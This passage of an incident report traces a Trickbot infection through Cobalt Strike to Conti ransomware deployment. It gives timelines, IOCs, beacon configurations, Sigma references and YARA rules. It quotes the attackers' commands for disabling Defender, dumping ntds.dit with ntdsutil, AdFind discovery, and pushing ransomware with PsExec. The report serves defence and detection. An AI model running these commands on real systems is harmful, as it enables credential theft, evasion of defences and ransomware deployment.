We observed the threat actors having technical issues. One example being with a Beacon unsuccessfully injecting into a process. It is unclear if this was an untrained actor, or there was a configuration issue.
Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to “SYSTEM” using named pipe impersonation.
Almost four hours after initial execution, the threat actors pivoted to a domain controller using domain admin credentials and executed a Cobalt Strike Beacon. Once they had domain controller access, ntdsutil was used to take a snapshot of “ntds.dit”, saved under “C:Perflogs1”, for offline password hash extraction. This is a technique that we don’t see very often, but effective nevertheless.
The threat actors then reran many of the same discovery techniques that were previously executed on the beachhead, including AdFind and BloodHound. This was the last observed hands-on-keyboard activity for awhile.
Two days later, the Cobalt Strike Beacon on the domain controller was once again actively engaged by the threat actors. Psexec, with two separate batch files, were used to execute Conti ransomware on all domain-joined Windows hosts. This final deployment was executed around 6:45 UTC on a Monday morning.
From the point the threat actors returned, to ransom deployment, it was less than 30 minutes. This would give defenders little time to act if they had not identified and contained the activity from the first day of the Trickbot infection.
Services
We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. Two of the Cobalt Strike servers used in this intrusion were added to our Threat Feed on 6/3/21 and the other one was added on 6/11/21
We also have artifacts available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.
Timeline
Analysis and reporting completed by @_pete_0 and @kostastsale.
Reviewed by @RoxpinTeddy and 1 unnamed contributor.
Initial Access
The initial access was achieved as a result of the user opening what appeared to be a benign workbook, a lure, requiring little user interaction.
The workbook contained hidden and password protected worksheets, these were malicious. Module functions also indicated code designed to obfuscate and hide true values and functions.
This document and the following DLL were noted as being associated to a BazarCall campaign by @ffforward.
1/ Today #BazarCall dropped #TrickBot gtag mon311 from their brand new website /zonerphoto.us. I guess the gangs increased activity is to show that they are alive and well without that random programmer? pic.twitter.com/CVfcn7b9mJ
— TheAnalyst (@ffforward) June 10, 2021
Execution
From the xlsb document, the following execution chain occurs. Including copying the Windows CertUtil program and using that to collect further Trickbot payloads.
We observed a second stage execution using regsvr32 to load a DLL from the user’s AppDataLocalTemp folder.
Almost immediately an outbound IPv4 address lookup was requested via HTTP. This is usually undertaken to identify the compromised environment, and to facilitate C2. The user agent refers to Curl – and used again for another stage of the intrusion.
On the beachhead, multiple executables were saved in a temp directory and then pushed into memory by TrickBot process “wermgr.exe”. The executables were identified as Cobalt Strike and communicated over port 443 to C2 88.80.147[.]101.
A PowerShell download cradle was then used to execute Cobalt Strike Beacon in memory:
Privilege Escalation
Named pipe impersonation was used to escalate to SYSTEM privileges – a common Cobalt Strike capability:
We observed several attempts by the threat actor trying to escalate to SYSTEM – ultimately succeeding, as evident in several new services running under the Local SYSTEM context:
Service creation events System Event ID 7045, coupled with unusual commands and service names are a strong indication of privilege escalation activity. RedCanary provided useful background on GetSystem capabilities of offensive security tools and methods of detection.
Defense Evasion
Trickbot made extensive use of process injection to hide in benign operating system processes. It first injected into wermgr.exe and then later into svchost.exe.
Another defense evasion technique employed by Cobalt Strike, was to disable Windows Defender. WMIC was used to remotely execute ‘def.bat’. The contents of ‘def.bat’:
Set-MpPreference -DisableRealtimeMonitoring $true
Credential Access
Trickbot made use of esentutl to gather MSEdge history, webcache, and saved passwords using TrickBot’s “pwgrab” module.
LSASS was dumped remotely using ProcDump. The execution took place from the beachhead using WMIC.
“Ntdsutil” was used to take a snapshot of ntds.dit and save it under “C:Perflogs1”. This technique is useful for offline password hash extraction. This activity occurred twice. The same batch file, ‘12.bat’, was first executed in the context of SYSTEM; and secondly, in the context of a domain admin user. The contents of ‘12.bat’:
ntdsutil "ac in ntds" "ifm" "cr fu C:Perflogs1" q q
Discovery
Net and Nltest commands were used to gather network and domain reconnaissance. During the intrusion, this activity was seen multiple times, on multiple hosts.
Other discovery commands included:
systeminfo
nltest /dclist:<hidden>.local
nltest /domain_trusts /all_trusts
net localgroup Administrators
whoami.exe" /groups
AdFind.exe and adf.bat were uploaded to the beachhead. adf.bat was used to execute:
adfind.exe -f "(objectcategory=person)"
adfind.exe -f "(objectcategory=organizationalUnit)"
adfind.exe -f "objectcategory=computer"
adfind.exe -gcb -sc trustdmp
adfind.exe -f "(objectcategory=group)"
adfind.exe -subnets -f (objectCategory=subnet)
adfind.exe -sc trustdmp
AdFind results were written to the following locations:
C:WindowsTempadfad_group.txt
C:WindowsTempadftrustdmp.txt
C:WindowsTempadfsubnets.txt
C:WindowsTempadfad_ous.txt
C:WindowsTempadfad_computers.txt
C:WindowsTempadfad_users.txt
On the beachhead, Cobalt Strike executed BloodHound in memory. The results were saved in:
"C:WindowsTempDogi"
BloodHound was later executed on the domain controller as well. Once again the results were stored in:
"C:WindowsTempDogi"
PowerSploit was loaded into memory on the DC and the following functions were used:
Get-NetSubnet
Get-NetComputer –ping
An encoded PowerShell command was executed on the domain controller to enumerate all AD joined hosts and save the results to:
"C:UsersAllWindows.csv"
The decoded PowerShell command:
Lateral Movement
From the beachhead, WMIC was used to remotely execute ‘165.bat’ on two other hosts.
Multiple failed attempts were observed prior to the successful execution of a PowerShell Cobalt Strike loader via a service with “SYSTEM” privileges.
Decoded Cobalt Strike shellcode, using Cyber Chef recipe: https://github.com/mattnotmax/cyberchef-recipes#recipe-28—de-obfuscation-of-cobalt-strike-beacon-using-conditional-jumps-to-obtain-shellcode
Command and Control
Multiple C2 channels were established, some were persistent whilst others appeared to be single purpose – used for payload retrieval or fallback C2. Persistent C2 activity was Cobalt Strike. The beachhead had multiple C2 channels, two of which were unique. We assess that the threat actors were ensuring a loss of a single source C2 wouldn’t result in losing all C2 to the compromised environment.
We observed a payload being retrieved from a unique IPv4 address. An indication that the threat actors were keeping C2 channels independent from payload delivery/retrieval.
Using the Curl 7.74.0 user agent:
Analysis of this binary, shows C2 activity to the following:
The binary has an unusual PDB string that indicates obfuscation:
The two persistent C2 channels were analyzed to determine the Cobalt Strike configuration. Each C2 channel was configured as follows:
- 149.248.52[.]187:443
- Onlineworkercz[.]com
(added to Threat Feed on 2021-06-11)
{
"x86": {
"sha1": "3f15a07cde64efda49670664af320603cf19e8a3",
"sha256": "d4ab4ed720d674d4c8c35d48006724a9cf20396e020d5bd6c12fce8d44b8ed5a",
"time": 1623422265288,
"config": {
"Method 1": "GET",
"Spawn To x64": "%windir%\sysnative\WUAUCLT[.]exe",
"Polling": 55490,
"HTTP Method Path 2": "/media",
"Port": 443,
"Spawn To x86": "%windir%\syswow64\WUAUCLT[.]exe",
"Jitter": 41,
"C2 Server": "onlineworkercz[.]com,/kj",
"Method 2": "POST",
"Beacon Type": "8 (HTTPS)"
},
"md5": "7d9cdea210ed05a1ff96d7ff3e576c11"
},"x64": {
"sha1": "1d50772d506f1def4bd0659b38cf4cb41df7802c",
"sha256": "4f009eb4252cf29daa24d1d018815aa228f0c58aba126bff3fec4cd809cd9747",
"time": 1623422268773.6,
"config": {
"Method 1": "GET",
"Spawn To x64": "%windir%\sysnative\WUAUCLT[.]exe",
"Polling": 55490,
"HTTP Method Path 2": "/zh",
"Port": 443,
"Spawn To x86": "%windir%\syswow64\WUAUCLT[.]exe",
"Jitter": 41,
"C2 Server": "onlineworkercz[.]com,/kj",
"Method 2": "POST",
"Beacon Type": "8 (HTTPS)"
},
"md5": "23135b04a470db515db11e1364e3fcd9"
}
}
- 88.80.147[.]101:80
- gmbfrom[.]com
(added to Threat Feed on 2021-06-03)
{
"x86": {
"sha1": "b785cae596f7b68376464e3e300fe0aff5bea845",
"config": {
"Method 2": "POST",
"Port": 80,
"Method 1": "GET",
"Polling": 5000,
"Beacon Type": "0 (HTTP)",
"Jitter": 10,
"Spawn To x86": "%windir%\syswow64\dllhost[.]exe",
"C2 Server": "88[.]80[.]147[.]101,/jquery-3[.]3[.]1[.]min[.]js",
"HTTP Method Path 2": "/jquery-3[.]3[.]2[.]min[.]js",
"Spawn To x64": "%windir%\sysnative\dllhost[.]exe"
},
"time": 1622753064031.5,
"sha256": "dd0dd0b3e95ff62c45af048c0169e2631ac906da4a603cadbc7014cbcfb4e631",
"md5": "56830f9cc0fe712e22921a7a5a0f1a53"
},
"x64": {
"sha1": "11724324f8ec1940be87553ae2bd5f96b979a5d6",
"config": {
"Method 2": "POST",
"Port": 80,
"Method 1": "GET",
"Polling": 5000,
"Beacon Type": "0 (HTTP)",
"Jitter": 10,
"Spawn To x86": "%windir%\syswow64\dllhost[.]exe",
"C2 Server": "88[.]80[.]147[.]101,/jquery-3[.]3[.]1[.]min[.]js",
"HTTP Method Path 2": "/jquery-3[.]3[.]2[.]min[.]js",
"Spawn To x64": "%windir%\sysnative\dllhost[.]exe"
},
"time": 1622753068830.2,
"sha256": "36a5e68810f3823470fadd578efb75b5c2d1ffe9f4a16d5566f0722257cc51ce",
"md5": "9dde7f14a076a5c3db8f4472b87fd11e"
}
}
Trickbot C2 Configuration:
https://tria.ge/210610-vfygj4t1yn
Exfiltration
As part of the discovery stage, we observed data being exfiltrated. The data ranged from host discovery, running processes, and user accounts:
Entire AD forest data – including usernames , DC configuration, and machine enumeration:
Impact
When, the threat actors returned two days later, the final payloads were staged by the threat actors on a domain controller in the following location:
C:share$
Two batch scripts were executed on the domain controller to automate ransomware deployment via PSExec. The first was “_COPY.bat”, to stage the CONTI ransomware payload on all domain-joined computers. The second was “_EXE.bat”, to execute the staged CONTI payloads.
The batch scripts ran as expected a set of copy commands and then executed the Conti payload using psexec.
start PsExec.exe -accepteula @C:share$comps1.txt -u "domainUser" -p "$PASSWORD" cmd /c COPY "\DOMAINCONTROLLERshare$fQumH.exe" "C:windowstemp"
start PsExec.exe -accepteula -d @C:share$comps5.txt -u "domainUser" -p "$PASSWORD" cmd /c "C:windowstempfQumH.exe"
Files were then encrypted with the following extension [KCRAO]:
A readme.txt file was created in each folder:
The content of readme.txt:
IOCs
Network
Cobalt Strike
149.248.52.187|443 88.80.147.101|80
onlineworkercz.com
gmbfrom.com
Trickbot
116.0.6.110 123.231.149.123 146.196.121.219 177.221.39.161 180.178.106.50 85.248.1.126 94.142.179.179 94.142.179.77 88.150.240.129 46.209.140.220 85.175.171.246 89.37.1.2 94.183.237.101 103.101.104.229 103.124.145.98 114.7.240.222 131.0.112.122 123.231.149.122 45.5.152.39
File
netscan.exe d1d579306a4ddf79a2e7827f1625581c e141562aab9268faa4aba10f58052a16b471988a bb574434925e26514b0daf56b45163e4c32b5fc52a1484854b315f40fd8ff8d2 12.bat 935fa508d2c41914f4549d3805456444 d40b5147e93204f03f0acfb3ad4cbb1b6f296a35 f88a59e0c1aa48aa46680f28c9e09781d3f678567f38e3b1b1ba7d2437cd9e0c def.bat abe4a11df74f6a2f07682174b5fb2876 e928fc3d74b976c539d55f75318b5ba89dab3f11 8a7399c37a27c46e1d61150cba71d76737233a971e0c15b07c47bcc97e710bbe procdump.exe 6a09bc6c19c4236c0bd8a01953371a29 d1387f3c94464d81f1a64207315b13bf578fd10c 05732e84de58a3cc142535431b3aa04efbe034cc96e837f93c360a6387d8faad tdr615.exe a53f124fc4f07a26cc3497e665d0ec63 3f0a4ed4c0c1c5e156e4d29ac4adf109faa82cd9 12761d7a186ff14dc55dd4f59c4e3582423928f74d8741e7ec9f761f44f369e5 tdrE934.exe d803ea86227c541c54b11bb583b3910f f1b4faf4dfbf9ada3cc1496f9f9ad352314c2d59 48f2e2a428ec58147a4ad7cc0f06b3cf7d2587ccd47bad2ea1382a8b9c20731c start.bat 4841c54b37729544fddcd014f09aa46e f7d62cdca59fc09d19fa8a465ea3b2611cf797e1 f37b6c37e95f3fa27382f8b8e6256aa05e28703332bda54184e7223f82f02114 Get-DataInfo.ps1 16cde93b441e4363700dfbf34c687b08 092ac6f8d072c4cf045e35a839d5bb8f1360f1ae a290ce75c6c6b37af077b72dc9c2c347a2eede4fafa6551387fa8469539409c7 62.dll 9e7756f47e57a03e6eb5fe7d2505b870 fb6339704bf11507038ddaf8f01324da5b71ee19 8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab cancel_sub_VCP1234567890123.xlsx 9e1ee4a42c381eabcf2cde38a1aae7c9 015bb306d9e54001d433b3ac2e7212b864f54ae2 fd71a2fcc0b5dd0fb0dbff257839b67749f2cadf30e2d3dae7f0e941d93d24d3
Detections
Network
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
ET CNC Feodo Tracker Reported CnC Server group 1
ET CNC Feodo Tracker Reported CnC Server group 2
ET CNC Feodo Tracker Reported CnC Server group 3
ET CNC Feodo Tracker Reported CnC Server group 5
ET CNC Feodo Tracker Reported CnC Server group 8
ET CNC Feodo Tracker Reported CnC Server group 9
ET CNC Feodo Tracker Reported CnC Server group 19
ET CNC Feodo Tracker Reported CnC Server group 22
ET CNC Feodo Tracker Reported CnC Server group 23
ET CNC Feodo Tracker Reported CnC Server group 24
ET POLICY HTTP traffic on port 443 (POST)
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY curl User-Agent Outbound
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ET INFO Executable Download from dotted-quad Host
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
ET MALWARE Trickbot Checkin Response
ET POLICY Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
ET MALWARE Win32/Trickbot Data Exfiltration
ET POLICY IP Check wtfismyip.com
GPL ATTACK_RESPONSE command completed
ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me)
ET INFO Dotted Quad Host DLL Request
ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3
ET POLICY Possible External IP Lookup ipinfo.io
Sigma
Abused Debug Privilege by Arbitrary Parent Processes – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml
Accessing WinAPI in PowerShell. Code Injection – https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/powershell/powershell_code_injection.yml
Bad Opsec Powershell Code Artifacts – https://github.com/SigmaHQ/sigma/blob/5e35e387dd0dcdd564db7077da3470fbc070b975/rules/windows/powershell/powershell_bad_opsec_artifacts.yml
CobaltStrike Service Installations – https://github.com/SigmaHQ/sigma/blob/b26eece20d4c19b202185a6dce86aff147e92d0f/rules/windows/builtin/win_cobaltstrike_service_installs.yml
CreateMiniDump Hacktool – https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_hktl_createminidump.yml
Domain Trust Discovery – https://github.com/SigmaHQ/sigma/blob/99b0d32cec5746c8f9a79ddbbeb53391cef326ba/rules/windows/process_creation/win_trust_discovery.yml
Dridex Process Pattern – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_dridex.yml
Empire PowerShell Launch Parameters – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_empire_launch.yml
Execution from Suspicious Folder – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_execution_path.yml
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ntdsutil.yml
Local Accounts Discovery – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_local_system_owner_account_discovery.yml
LSASS Memory Dump – https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_memdump.yml
LSASS Memory Dump File Creation – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml
LSASS Memory Dumping – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_lsass_dump.yml
Malicious Base64 Encoded PowerShell Keywords in Command Lines – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hidden_b64_cmd.yml
Malicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_malicious_commandlets.yml
Mimikatz Detection LSASS Access – https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml
Net.exe Execution – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_net_execution.yml
Non Interactive PowerShell – https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml
PowerShell as a Service in Registry – https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_powershell_as_service.yml
PowerShell Download from URL – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_powershell_download.yml
PowerShell Execution – https://github.com/SigmaHQ/sigma/blob/8aabb58eca06cc44ae21ae4d091793d8c5ca6a23/rules/windows/image_load/sysmon_powershell_execution_moduleload.yml
PowerShell Network Connections – https://github.com/SigmaHQ/sigma/blob/c91eda766032b14eee60412a14875f91664e670f/rules/windows/network_connection/sysmon_powershell_network_connection.yml
PowerShell Scripts Installed as Services – https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/builtin/win_powershell_script_installed_as_service.yml
Psexec Accepteula Condition – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_psexec_eula.yml
PsExec Tool Execution – https://github.com/SigmaHQ/sigma/blob/ea430c8823803b9026a4e6e2ea7365dc5d96f385/rules/windows/other/win_tool_psexec.yml
Rare Service Installs – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_rare_service_installs.yml
Regsvr32 Anomaly – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
Rundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_connections.yml
Suspicious AdFind Execution – https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_adfind.yml
Suspicious Encoded PowerShell Command Line – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml
Suspicious In-Memory Module Execution – https://github.com/SigmaHQ/sigma/blob/5cf7078fb3d61f2c15b01d9426f07f9197dd3db1/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml
Suspicious PowerShell Parent Process – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_parent_process.yml
Suspicious Remote Thread Created – https://github.com/SigmaHQ/sigma/blob/e7d9f1b4279a235406b61cc9c16fde9d7ab5e3ba/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml
Suspicious Use of Procdump – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump.yml
Suspicious Use of Procdump on LSASS – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump_lsass.yml
Suspicious WMI Execution – https://github.com/SigmaHQ/sigma/blob/5e701a2bcb353338854c8ab47de616fe7e0e56ff/rules/windows/process_creation/win_susp_wmi_execution.yml
Trickbot Malware Recon Activity – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_trickbot_recon_activity.yml
UNC2452 Process Creation Patterns – https://github.com/SigmaHQ/sigma/blob/e7d9f1b4279a235406b61cc9c16fde9d7ab5e3ba/rules/windows/process_creation/win_apt_unc2452_cmds.yml
Usage of Sysinternals Tools – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml
Whoami Execution – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_whoami.yml
Windows Network Enumeration – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_net_enum.yml
Windows PowerShell Web Request – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/win_powershell_web_request.yml
Yara Rules
/*
YARA Rule Set
Author: The DFIR Report
Date: 2021-08-02
Identifier: 4641
Reference: https://thedfirreport.com
*//* Rule Set ----------------------------------------------------------------- */
import "pe"
rule sig_4641_fQumH {
meta:
description = "4641 - file fQumH.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "3420a0f6f0f0cc06b537dc1395638be0bffa89d55d47ef716408309e65027f31"
strings:
$s1 = "Usage: .system COMMAND" fullword ascii
$s2 = "Usage: .log FILENAME" fullword ascii
$s3 = "* If FILE begins with "|" then it is a command that generates the" fullword ascii
$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s5 = "Usage %s sub-command ?switches...?" fullword ascii
$s6 = "attach debugger to process %d and press any key to continue." fullword ascii
$s7 = "%s:%d: expected %d columns but found %d - extras ignored" fullword ascii
$s8 = "%s:%d: expected %d columns but found %d - filling the rest with NULL" fullword ascii
$s9 = "Unknown option "%s" on ".dump"" fullword ascii
$s10 = "REPLACE INTO temp.sqlite_parameters(key,value)VALUES(%Q,%s);" fullword ascii
$s11 = "error in %s %s%s%s: %s" fullword ascii
$s12 = "UPDATE temp.sqlite_master SET sql = sqlite_rename_column(sql, type, name, %Q, %Q, %d, %Q, %d, 1) WHERE type IN ('trigger', 'view" ascii
$s13 = "BBBBBBBBBBBBBBBBBBBB" wide /* reversed goodware string 'BBBBBBBBBBBBBBBBBBBB' */
$s14 = "UPDATE temp.sqlite_master SET sql = sqlite_rename_column(sql, type, name, %Q, %Q, %d, %Q, %d, 1) WHERE type IN ('trigger', 'view" ascii
$s15 = ");CREATE TEMP TABLE [_shell$self](op,cmd,ans);" fullword ascii
$s16 = "SqlExec" fullword ascii
$s17 = "* If neither --csv or --ascii are used, the input mode is derived" fullword ascii
$s18 = "Where sub-commands are:" fullword ascii
$s19 = "max rootpage (%d) disagrees with header (%d)" fullword ascii
$s20 = "-- Query %d --------------------------------" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 4000KB and
( pe.imphash() == "67f1f64a3db0d22bf48121a6cea1da22" or 8 of them )
}rule sig_4641_62 {
meta:
description = "4641 - file 62.dll"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "8b9d605b826258e07e63687d1cefb078008e1a9c48c34bc131d7781b142c84ab"
strings:
$s1 = "Common causes completion include incomplete download and damaged media" fullword ascii
$s2 = "An error occurred writing to the file" fullword ascii
$s3 = "asks should be performed?" fullword ascii
$s4 = "The waiting time for the end of the launch was exceeded for an unknown reason" fullword ascii
$s5 = "Select the Start Menu folder in which you would like Setup to create the programs shortcuts, then click Next. Which additional t" ascii
$s6 = "HcA<E3" fullword ascii /* Goodware String - occured 1 times */
$s7 = "Select the Start Menu folder in which you would like Setup to create the programs shortcuts, then click Next. Which additional t" ascii
$s8 = "D$([email protected]" fullword ascii /* Goodware String - occured 1 times */
$s9 = "Please verify that the correct path and file name are given" fullword ascii
$s10 = "Critical error" fullword ascii
$s11 = "Please read this information carefully" fullword ascii
$s12 = "Unknown error occurred for time: " fullword ascii
$s13 = "E 3y4i" fullword ascii
$s14 = "D$tOuo2" fullword ascii
$s15 = "D$PH9D$8tXH" fullword ascii
$s16 = "E$hik7" fullword ascii
$s17 = "D$p]mjk" fullword ascii
$s18 = "B):0~"Z" fullword ascii
$s19 = "Richo/" fullword ascii
$s20 = "D$xJij" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 70KB and
( pe.imphash() == "42205b145650671fa4469a6321ccf8bf" and pe.exports("StartW") or 8 of them )
}rule sig_4641_tdrE934 {
meta:
description = "4641 - file tdrE934.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "48f2e2a428ec58147a4ad7cc0f06b3cf7d2587ccd47bad2ea1382a8b9c20731c"
strings:
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s2 = "D:\1W7w3cZ63gF\wFIFSV\YFU1GTi1\i5G3cr\Wb2f\Cvezk3Oz\2Zi9ir\S76RW\RE5kLijcf.pdb" fullword ascii
$s3 = "https://sectigo.com/CPS0" fullword ascii
$s4 = "2http://crl.comodoca.com/AAACertificateServices.crl04" fullword ascii
$s5 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
$s6 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
$s7 = "ntdll.dlH" fullword ascii
$s8 = "http://ocsp.sectigo.com0" fullword ascii
$s9 = "2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s" fullword ascii
$s10 = "2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#" fullword ascii
$s11 = "tmnEt6XElyFyz2dg5EP4TMpAvGdGtork5EZcpw3eBwJQFABWlUZa5slcF6hqfGb2HgPed49gr2baBCLwRel8zM5cbMfsrOdS1yd6bMpepebebyT4NIN6zOvk" fullword ascii
$s12 = "[email protected]" fullword ascii
$s13 = "operator co_await" fullword ascii
$s14 = "ZGetModuleHandle" fullword ascii
$s15 = "api-ms-win-appmodel-runtime-l1-1-2" fullword wide
$s16 = "RtlExitUserThrea`NtFlushInstruct" fullword ascii
$s17 = "UAWAVAUATVWSH" fullword ascii
$s18 = "AWAVAUATVWUSH" fullword ascii
$s19 = "AWAVVWSH" fullword ascii
$s20 = "UAWAVATVWSH" fullword ascii
condition:
uint16(0) == 0x5a4d and filesize < 2000KB and
( pe.imphash() == "4f1ec786c25f2d49502ba19119ebfef6" or 8 of them )
}rule sig_4641_netscan {
meta:
description = "4641 - file netscan.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "bb574434925e26514b0daf56b45163e4c32b5fc52a1484854b315f40fd8ff8d2"
strings:
$s1 = "netscan.exe" fullword ascii
$s2 = "TFMREMOTEPOWERSHELL" fullword wide
$s3 = "TFMREMOTEPOWERSHELLEDIT" fullword wide
$s4 = "TFMBASEDIALOGREMOTEEDIT" fullword wide
$s5 = "*http://crl4.digicert.com/assured-cs-g1.crl0L" fullword ascii
$s6 = "*http://crl3.digicert.com/assured-cs-g1.crl00" fullword ascii
$s7 = "TFMIGNOREADDRESS" fullword wide
$s8 = "TREMOTECOMMONFORM" fullword wide
$s9 = "TFMSTOPSCANDIALOG" fullword wide
$s10 = "TFMBASEDIALOGSHUTDOWN" fullword wide
$s11 = "TFMBASEDIALOG" fullword wide
$s12 = "TFMOFFLINEDIALOG" fullword wide
$s13 = "TFMLIVEDISPLAYLOG" fullword wide
$s14 = "TFMHOSTPROPS" fullword wide
$s15 = "GGG`BBB" fullword ascii /* reversed goodware string 'BBB`GGG' */
$s16 = "SoftPerfect Network Scanner" fullword wide
$s17 = "TUSERPROMPTFORM" fullword wide
$s18 = "TFMREMOTESSH" fullword wide
$s19 = "TFMREMOTEGROUPSEDIT" fullword wide
$s20 = "TFMREMOTEWMI" fullword wide
condition:
uint16(0) == 0x5a4d and filesize < 6000KB and
( pe.imphash() == "573e7039b3baff95751bded76795369e" and ( pe.exports("__dbk_fcall_wrapper") and pe.exports("dbkFCallWrapperAddr") ) or 8 of them )
}rule sig_4641_tdr615 {
meta:
description = "4641 - file tdr615.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "12761d7a186ff14dc55dd4f59c4e3582423928f74d8741e7ec9f761f44f369e5"
strings:
$s1 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s2 = "I:\RoDcnyLYN\k1GP\ap0pivKfOF\odudwtm30XMz\UnWdqN\01\7aXg1kTkp.pdb" fullword ascii
$s3 = "https://sectigo.com/CPS0" fullword ascii
$s4 = "2http://crl.comodoca.com/AAACertificateServices.crl04" fullword ascii
$s5 = "?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v" fullword ascii
$s6 = "3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%" fullword ascii
$s7 = "http://ocsp.sectigo.com0" fullword ascii
$s8 = "2http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s" fullword ascii
$s9 = "2http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#" fullword ascii
